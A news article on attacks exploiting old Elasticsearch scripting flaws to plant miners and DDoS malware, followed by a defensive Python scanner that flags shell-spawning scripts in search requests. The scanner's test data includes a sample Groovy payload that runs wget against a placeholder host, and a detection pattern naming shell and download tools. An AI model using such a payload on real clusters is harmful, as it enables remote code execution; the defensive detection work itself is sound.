A large number of enterprises use Elasticsearch clusters to manage very large datasets, and that popularity is luring cyber criminals into planting malware on unsecured Elasticsearch clusters to gain access to the data they hold, Cisco Talos has warned.
In the recent past, security researchers have discovered a large number of Elasticsearch databases, both in the United States and in Europe, that stored very large amounts of data but were left unsecured by the enterprises that owned them.
Unsecured Elasticsearch clusters exposed millions to hackers
For instance, in November last year, security researcher Bob Diachenko came across an unprotected Elasticsearch database that contained detailed personal records of as many as 57 million U.S. citizens; another index in the same database contained 25 million additional records.
A week prior to this discovery, Diachenko had unearthed another unprotected cloud database hosted by data aggregator Adapt that contained over 9.3 million data records, including personal data as well as job descriptions of millions of individuals.
The database contained as many as 9,376,173 personal data records that included first and last names, phone numbers, name of the companies where the individuals were employed, job titles, job descriptions, list of company domains, industry, company revenue, email confidence scores, total contacts available in the company, and emails of every contact in the company.
In January this year, Diachenko again discovered an Elasticsearch database that contained 51GB of confidential financial and banking data, which any opportunistic cyber criminal could use to carry out identity fraud, file false tax returns, and obtain loans and credit cards in the names of innocent citizens.
Considering that Elasticsearch databases managed by enterprises contain very large datasets of both customer and enterprise records, it is imperative for organisations to take all necessary steps to secure such clusters. The need is urgent: according to Cisco Talos, there has been a spike in attacks from multiple threat actors targeting these clusters.
Version 1.4.2 and lower clusters vulnerable to attacks
The firm warned that cyber criminals are exploiting two old vulnerabilities, CVE-2014-3120 and CVE-2015-1427, which let scripts embedded in search queries execute on the server, to drop malware or cryptominers onto Elasticsearch clusters running version 1.4.2 or lower.
"The most active of these actors consistently deploys two distinct payloads with the initial exploit, always using CVE-2015-1427. The first payload invokes wget to download a bash script, while the second payload uses obfuscated Java to invoke bash and download the same bash script with wget. This is likely an attempt to make the exploit work on a broader variety of platforms.
"Talos observed a second actor exploiting CVE-2014-3120, using it to deliver a payload that is derivative of the Bill Gates distributed denial-of-service malware. The reappearance of this malware is notable because, while Talos has previously observed this malware in our honeypots, the majority of actors have transitioned away from the DDoS malware and pivoted toward illicit miners," the firm noted.
The firm added that, to prevent malicious actors from exploiting CVE-2014-3120 and CVE-2015-1427 to inject malware into their Elasticsearch clusters, enterprises running version 1.4.2 or lower should upgrade to a newer version. At the same time, enterprises should disable the ability to send scripts through search queries (dynamic scripting) wherever that ability is not strictly necessary for their use case.
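The two checks a defender would want from the preceding paragraphs, as an added example that is not part of the article or of Cisco Talos's tooling: first, whether a cluster's reported version falls in the affected range (1.4.2 or lower, per the article); second, a scanner over search request bodies (as captured by a reverse proxy or packet capture) that flags scripts which spawn a shell or fetch a second stage with wget, the pattern the Talos quote describes. The request bodies, the version strings and the indicator list are constructed for this example; the `script`/`inline` key handling covers the 1.x string form and the later object form of a script in a search body.

```python
"""Detection helpers for the Elasticsearch dynamic-scripting RCE pattern
(CVE-2014-3120 / CVE-2015-1427). Example code; sample inputs are constructed."""
import json
import re

# Last affected release according to the article: 1.4.2 and lower.
LAST_VULNERABLE = (1, 4, 2)

# Indicators of a script that executes a shell or downloads a stage-2 payload
# (assumed indicator list for this example, not an exhaustive signature).
SUSPICIOUS = re.compile(
    r"(Runtime|ProcessBuilder|getRuntime|\.exec\(|wget|curl|/bin/(ba)?sh)", re.I
)


def parse_version(version):
    """'1.4.2' -> (1, 4, 2); a '-beta'/'-SNAPSHOT' suffix is ignored."""
    return tuple(int(p) for p in re.findall(r"\d+", version)[:3])


def is_vulnerable_version(version):
    """True when the reported version is 1.4.2 or lower."""
    return parse_version(version) <= LAST_VULNERABLE


def find_scripts(node):
    """Yield every script string in a parsed search request body, walking
    nested dicts/lists so script_fields, sorts and function_score are all covered."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key in ("script", "inline") and isinstance(value, str):
                yield value
            else:
                yield from find_scripts(value)
    elif isinstance(node, list):
        for item in node:
            yield from find_scripts(item)


def classify_request(body):
    """Return the suspicious script strings in a JSON request body ([] if none).
    Only script strings are matched, so 'wget' in ordinary query text is ignored."""
    try:
        doc = json.loads(body)
    except ValueError:
        return []
    return [s for s in find_scripts(doc) if SUSPICIOUS.search(s)]


# Constructed sample request bodies (not real captured traffic).
SAMPLE_ATTACK = json.dumps({
    "size": 1,
    "query": {"match_all": {}},
    "script_fields": {
        "x": {"lang": "groovy",
              "script": "Runtime.getRuntime().exec(\"wget http://example.invalid/s.sh\")"}
    },
})
SAMPLE_BENIGN_SCRIPT = json.dumps({
    "script_fields": {"doubled": {"script": "doc['price'].value * 2"}}
})
SAMPLE_BENIGN_TEXT = json.dumps({"query": {"match": {"title": "wget tutorial"}}})


def scan_requests(bodies):
    """Map each request index to its suspicious scripts; indices with no hits are omitted."""
    hits = {}
    for i, body in enumerate(bodies):
        found = classify_request(body)
        if found:
            hits[i] = found
    return hits


if __name__ == "__main__":
    for v in ("1.1.1", "1.4.2", "1.4.3", "2.0.0"):
        print(v, "affected" if is_vulnerable_version(v) else "not affected")
    for idx, scripts in scan_requests(
            [SAMPLE_ATTACK, SAMPLE_BENIGN_SCRIPT, SAMPLE_BENIGN_TEXT]).items():
        print("request", idx, "suspicious scripts:", scripts)
```

`is_vulnerable_version` should be fed the `version.number` value returned by the cluster's root endpoint; the scanner is a triage aid for request logs and does not replace upgrading or disabling dynamic scripting.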